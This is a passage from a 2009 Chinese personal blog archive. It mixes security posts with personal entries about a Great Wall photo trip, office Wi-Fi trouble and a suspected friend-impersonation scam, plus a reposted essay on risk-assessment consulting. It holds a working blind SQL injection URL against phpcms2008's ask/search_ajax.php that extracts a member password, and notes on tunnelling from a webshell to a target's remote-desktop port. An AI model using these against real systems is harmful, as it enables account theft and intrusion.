前面的1234是本机连接用的端口,中间的ip地址是目标服务器的(可以是webshell所在服务器也可以是和它同内网的服务器),后面的3389是欲连接目标服务器的端口。

成功后两个命令行窗口都会有成功提示。


这时通道已经建立,你连接本机的1234端口就相当于连接到目标服务器的3389端口了。

数据的传递过程

三月 16th, 2009

Posted In: 未分类

作者:nuke

受影响程序: phpcms2008 gbk

漏洞文件:ask/search_ajax.php
code:

listinfo($where, 'askid DESC', '', 10);foreach($infos as $key=>$val){$val['title'] = str_replace($q, ''.$q.'', $val['title']);$info[$key]['title'] = CHARSET != 'utf-8' ? iconv(CHARSET, 'utf-8', $val['title']) : $val['title'];$info[$key]['url'] = $val['url'];}echo(json_encode($info));?>

测试方法:
ask/search_ajax.php?q=s%E6'/**/or/**/(select ascii(substring(password,1,1))/**/from/**/phpcms_member/**/where/**/username=0x706870636D73)>52%23

三月 16th, 2009

Posted In: 未分类

上月好忙,这月总算闲下来了,就叫上个和我一样对摄影发烧的同事一块去长城一日摄影,先叫了模特一号,结果别人要回家去看看,不是常说“常回家看看吗”就这样,一号模特不能参加,然后叫二号模特,结果,二号模特说表哥要订亲,结果又泡汤,就这样叫上了几个大男人一块上长城

一大早就出发,第一件事就是去超市购买水,这个是上长城不可免的东西,然后买上火腿,面包,要知道在长城上想吃点东西只能自备了,对于偶这种喜欢登山的人来说,这都是习惯,带上几个人超市狂购后,就开始了一天旅游的开始,去了德胜门,上了919,别提那种兴奋劲,同事拿我的相机狂拍,呵

常说,不到长城非好汉,第一次是为了陪朋友玩,所以第一次不算是登长城,而是坐滑车上去,别提多没劲了,今天怎么说都不这样了,带了同事买了票,哈,就直接上了长城,一口气登了四个锋火台,然后就是边走边拍,长城虽然不是最佳的摄影地方,去的是一种体验,呵,好了,也要搬家了,准备东西,先整理好,明天上传偶们的照片,哈

三月 10th, 2009

Posted In: 未分类

出处:比特网

刚开始看到这个题目可能可能很多人都会产生不解,究竟这个风险评估过程中的“风险”指的是什么呢?是评估出来的风险结果还是评估过程中遇到的实施风险呢?所以首先我要解释一下下面到要谈的究竟是什么内容。
  做信息安全的人都知道风险评估,而我在这里不谈那些技术评估、应用评估、流程评估等评估过程中的问题,只谈我们作为乙方在做咨询项目中通常都要做到的信息资产的风险评估,而这个风险评估过程中的“风险”也是指的在评估过程中遇到的实施风险。在下面的文章中我不谈如何做信息资产风险评估的方法,也不谈什么方法好,什么方法不好,因为风险评估工作各家有各家的做法,各人有个人的理解,不同的项目、不同的客户也存在不同的情况,所以针对具体情况选择合适的风险评估方法,化解在评估过程中可能遇到的问题和风险才是我这次要谈的内容。

1、风险评估的第一的误区

  同一套方法,这在很多人看来是没什么奇怪的,我们在项目中做风险评估最关注的几个问题是,一方面,要尽量有效全面的评估出风险,并根据风险制定有效的控制,这是从评估的实用性和为客户带来效果的角度(即项目质量)来说的;另一方面我们还要保证项目的进度,常做评估的人都知道风险评估在资产识别阶段不能做的太细,避免做成CMDB,就是为了控制项目的进度。

  每家公司或每个人可能都会有一套做信息资产风险评估的最佳放法论,这套方法论通常是多年实践积累、改进而来或从哪里直接借鉴过来的,而通常去给客户做风险的评估的时候也都是拿着这套所谓的最佳实践去做的(尤其是新手居多)。但这就忽略了一个问题,每个客户的实际情况是不同的,项目范围也是不同的,其信息资产的分布和管理方式、以及客户实际的配合力度以及客户是否需要通过认证的情况都是不一样的。在实际实施过程中可能会遇到,客户原本的资产管理就很混乱,缺少集中或统一了解和管理资产的人,人员对资产的熟悉情况太分散,评估的结果是否要与等保和安全域结合,客户是否有充分的人员和时间配合你工作等等情况。

  因此如果不能够很好的根据客户选择评估的方法有时是会影响项目实施的。所以我们需要根据客户的具体情况适当调整我们评估的方法和实施方式,比如,我们是选择按部门划分评估,还是按资产分类评估,还是按系统分组来评估,资产分类的粒度要到什么程度。也就是说我们可能同时要掌握不只一套风险评估的操作方法,或者说同样的方法不能一成不变的应用到每个项目。当然如果大家不接受我的这个观点恐怕看接下来的内容也意义不大了。

2、前期沟通的重要性

  这个问题关系到项目售前和项目经理之间的交流,以及最初项目计划的制定工作阶段。

  我们都知道做风险评估的首要工作就是要明确风险评估的范围,即不能做小了(不全面,反应不了整体情况),也不能做大了(做了不该做的,影响实施进度)。因此在项目洽谈的初期涉及到制定项目计划的时候就要考虑到这个问题了。首先应当与客户沟通清楚究竟哪些人员、部门或哪些公司要做评估,同时要更详细的了解或预估出在这个范围内可能个会涉及到多少的信息资产,大约需要多大的工作量和多少工时,然后再制定实施计划。千万不能只是初略的约定了哪个哪个部门或哪个哪个公司,就根据自己以往的经验制定计划了,不同客户的人员数量和资产范围那都是不一样的,切戒范经验主义错误。如果等到人员进场之后再去和客户确定这个问题,这时候一旦实际情况超出预计,你的实施计划已经制定好了,再去修改改就比较麻烦了。

  所以前期的沟通交流一定要做的细致,千万不能马虎,售前与项目经理之间也要做好沟通和交流,尽量不要一味的为了打单子而忽略的后期实施过程中的风险。当然这个问题不单针对风险评估,所有与项目实施相关的工作在前期都应做好工作量的预估。

3、注意与其他标准的结合

  有的时候在某些项目中我们做完信息资产的风险评估之后可能还要做等级保护实施、信息安全规划或安全域划分等工作,这时候在选择或制定风险评估方法就要注意与这些工作的对应或关联。以结合等级保护或安全域为例,通常这种情况我们使用以资产类别进行划分资产,按照一类资产进行风险评估的方法就不是很适用,因问它不能很好的反映出系统层面的重要性。这时我们可以考虑使用按系统进行资产分组,对系统资产组进行风险评估的方法,这样的操作也能为我们后期进行等级保护或安全域的划分提供帮助。

  但在采用这种按系统评估的方法时需要注意一些问题。1、系统资产组价值与等保系统级别之间的对应关系,比如我们资产价值打分从1-5或1-3,那么如何对应到等级保护的1-4级别,可能就需要做一些映射关系。2、由于按系统评估评估的方法中对资产的识别粒度相对较细,因此切忌不要陷入CMDB的风险中,只要把系统相关的每个资产需要参与评估的信息识别出来就可以了,千万不要搞的太细了,把什么IP地址或系统间访问关系都搞出来了。(当然不是说这些东西没有用,如果后期做安全域划分还是有用的)但一定牢记根据项目的要求调整评估的方法,否则将影响项目进度。

4、分值与精确度的设计

  对于分值和精确度的选择我想有经验的顾问都有自己的看法,我这里的建议主要希望为刚接触风险评估的人提供一些帮助。

  现在主流的风险评估方法都会不同程度的使用数字打分的方式,有1-3的,也有1-5的,不管怎么打分其目的都是为了区分出资产价值的重要程度,明确资产风险的重要性,所以只要你的方法论合理,1-3还是1-5都没有什么区别,我认为都可以,只是1-3分级较粗可能更适合资产少、规模较小的客户,而1-5 分级较细,适合资产多、规模较大的客户。

  当我们做完资产CIA打分和风险影响、概率打分之后通常都会使用公式计算出资产的价值或风险值,这里我要说明一点的就是对于这个计算出来的分值我们应当尽量保留1位小数(个人感觉保留2位用处不是很大),由于资产数量众多时,保留整数的分值可能会出现许多同分的情况,为了便于我们后期的分析和整理工作,建议最好先保留1位小数这样重复的概率会降低很多,有利于我们对于资产和风险排序,也让结果变得更加精细。

5、客户规模与评估方法的选择

  我们公司现在常用的风险评估方法主要有2种,一种是根据不同的部门,按资产分类进行识别,在资产类别层面进行风险评估;另一种是按系统或资产分组的方式划分,对资产组(或系统)进行分类识别,然后针对资产组(或系统)层面进行风险评估。这2种方法可以说是各有利弊。

  通过在多个项目中分别使用这2种不同的评估方法,我个人感觉第一种方法操作起来相对简单,实施过程较快,而且客户易于掌握和理解,花费时间较短,但最后评估出来的结果实用性较差,需要进行更加细致的风险汇总、归纳和风险分析。第二种方法操作相对复杂,对顾问和客户工作量大要求较大,实施起来较慢,而且客户较难快速掌握,但能够为后期工作提供更好的支撑和输入,同时评估的结果可用性较强。

  基于以上的区别在对待不同规模的客户时,根据项目的具体时间要求,我们就需要选择不同的方法,在项目计划时间相对紧张且客户资产数量庞大、系统数目众多的时候可以尽量选取第一种方法,相反则选择第二种方法。

6、认证与不认证客户的区别

  这里我把是否通过ISO27001认证客户的拿出来做比较主要是因为需要通过认证的客户在做风险评估的时候需要考虑的问题更多,而且评估结果需要做的更仔细一些,当然不是说不过认证的我们就糊弄了,不过认证的同样要做好的,只是在认证审核的过程中对评估结果的要求有些内容在实际中用处不是很大,实施过程中可以尽量不花费太多精力在这些工作上面。

  这里面的一个最常见区别的就是对于残余风险控制的处置识别工作,如果是不需要通过认证的客户那么这部分工作可以双方协商的情况下决定是客户日后自己做还是顾问指导客户来做,因为落实风险控制措施有时需要经过领导的审批、参与或者组织讨论,因此需要的时间可能会较多。但对于需要通过认证的客户那就一定要做完,因为这个在审核的时候时比较重要的审核内容之一,所以对于残余风险的控制措施制定,残余风险的分值预估甚至控制实施的有效程度等工作都需要在认证之前完成。

  另一个问题就是客户的配合力度问题,我们通常的做法是在做风险评估前从每个部门找出一个人全程参与我们的评估工作,但有时客户方的协调力度不够或其他原因会导致没有各部门接口人,这种情况对于不过认证的客户来说还好办,例如,经过双方沟通可以由顾问待做,由客户确认,或客户部分参与来做。但如果是需要过认证的客户就一定要强烈建议客户安排指定的接口人参与到风险评估工作的整个过程中来,因为在接受审核的过程中,这些人员也可能会接受审核公司的询问,如果他们不清楚风险评估的具体工作流程和理论方法,是会影响到审核结果的。

最后

  可能很多人在看完这篇文章之后会说“怎么写的乱糟糟的啊”,其实以上的内容都是我在项目实施过程中遇到的问题和想到的一些应对方法,都是有感而发,想到什么就写些什么,所以没有太考虑前后之间的逻辑问题,大家可以有选择的看看,如果能为大家在日后做风险评估的过程中提供一些帮助的话那就再好不过了。当然在实际的项目实施过程中可能遇到的问题也不只我上面提到的这些,例如,对于人员类、服务类、无形类资产的识别、赋值和评估等其他内容,在实施的时候也存在许多难点,尤其是新手也非常关心。但我这里只是把我现在的一些感受和想法写出来罢了,仅供大家参考。

三月 4th, 2009

Posted In: 未分类

公司组网,偶采用了无线覆盖方案,是很快就可以达到效果,可是问题来了,当加密后很多同事无法连接,查看加密方式,最后调整为都可以识别的wap-psk的tkip方式加密,可有的同事会有时断线,实在是郁闷,查了很多原因,也打过厂家的电话把我的方案讲明以后,厂家也说我的方案没问题,可问题到底是出在那,调整了频段,有太多的同事需要用网络,如果一直调整就会让大家无法工作,可不调整网络也是不太稳定

放松,调节思路,在次查找原因拿出解决方案

三月 4th, 2009

Posted In: 未分类

终于关掉了该死的QQ空间,记得很早以前就开始玩这个,做好模板后就没有在动过,那时也开通了自己的网站BLOG,更新文章总是两边都要更新,还是一边更新的好,还是自己的代码想怎么改都可以,不受限制,完分DIY的设置,不是有那么一句话么,我的地盘听我的,哈哈,在过几个月,BLOG也要易主,可不是换主人哦,只是女主角要换了,以此纪念四年前的一段事情,哈,也算是让我成长的最好的一课,也让我见识了很多,虽然学费是贵了点,但至少还玩的起,和该死的QQ空间说拜拜了,哈,喝点酒恭喜下

三月 3rd, 2009

Posted In: 未分类


你在吗,你会在网上买东西吗,面对一个朋友一连串的问话,有点哭笑不的,互联网混了九年,网银用了好几个,每个购物网站都走过,现在问到这样的问题,我只能回答“会”,那能帮我买点游戏点卡吗,虽然是朋友,但还是让我提高了警觉性,你是谁,回答是朋友的名字,我不太相信,为什么还会在求我了,没有必要了,即然有自己的原则,就不要在次打乱我的生活,如果不行就算了,拉黑了,其实无所谓哪,就问了一句,那借我的钱是否要还我了,回答的结果是,我有借过你钱吗,弄的实在郁闷,当我拿起电话拔过去,无人接听,就知道会这样,可在借你钱的时候我都会留下电子帐单,这就是习惯性的问题,这点钱没什么,人格,信誉,一切你都看成了什么,呵

三月 2nd, 2009

Posted In: 未分类

无觅相关文章插件,快速提升流量